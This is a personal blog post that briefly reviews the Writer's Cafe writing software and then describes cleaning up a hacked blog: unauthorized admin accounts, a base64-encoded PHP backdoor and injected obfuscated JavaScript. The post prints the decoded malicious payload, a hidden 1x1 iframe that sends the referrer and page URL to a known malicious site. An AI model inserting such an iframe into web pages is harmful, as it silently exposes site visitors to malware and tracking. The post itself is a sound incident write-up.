Dhivael/Anne’s Hyperactive Blog

I haven’t really been updating my blog at all recently. I just… haven’t felt very creative. Which I think is silly. Anyway, to combat this, I’ve downloaded and am playing with Writer’s Cafe.

Writer’s Cafe is a nifty little program that lets you storyboard and brainstorm. It also has a random name generator and a random plot idea generator. There’s an in-program journal as well. If you want to practice writing under a deadline, there’s a timer thing available as well. All in all, it the demo looks to be a nifty little program. The full one is about $60, but it looks to be a good deal for a serious writer.

(I think.)

I had reason to go searching for something in my blog this morning. In the process, I found out my blog had been hacked to redirect people away. Guess that’s what I get for not paying attention. I could’ve sworn that I’d upgraded… but apparently not.

Of course, I freaked.

Some digging around produced a helpful link or two or three regarding what to do.

After reading through the instructions, I prepared for hours worth of removing junk from my site. After downloading the entire blog as well as a backup of my SQL DB, I found… nothing. Well, almost nothing. The hack consisted of:

1. 6 or 7 unauthorized users, one of which was an admin.
2. Some obfuscated Javascript in the header.php of my theme.
3. A randomly named PHP file in my upload directory.

Things were, clearly, better than I thought. Despite the dire predictions of others, this was fairly simple to fix.

1. Upgrade! I thought I had before, obviously not. But I upgraded now.
2. Delete those unauthorized users.
3. Delete the “845530.php” file in my upload directory.
4. Delete the offending Javascript in my header.php file.

After doing this, I was left with an obfuscated PHP file and Javascript. So, of course, I decided to decrypt them.

The PHP file was easy. Two times through base64_decode() produced readable code. The offending file is pretty long, so I’m not sure precisely what it does, but there are a few interesting points. There are a few lines that seem to allow the hacker to download and email themselves your SQL DB. This is, no doubt, why you’re advised to change your password after getting hacked. It also likely helps your server function as a “relay” station for the Javascript. As such, it’s absolutely necessary that you find and delete this ASAP.

The Javascript proved a bit trickier. It was encoded differently and it took me awhile to figure out how to get it, and then that was only after help and a nudge in the right direction. It proved to be code that would write the following to your page:

<iframe src=’http://itsallbreaksoft.net/tds/in.cgi?3&seoref=” encodeURIComponent(document.referrer) “&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=” encodeURIComponent(document.URL) “&default_keyword=notdefine’ width=1 height=1 border=0 frameborder=0></iframe>

After Googling for itsallbreaksoft.net, this turned out to be a known “bad site”.

Strangely enough, none of the sites make mention of the obfuscated PHP file, although I’m fairly certain it’s all part of the same exploit.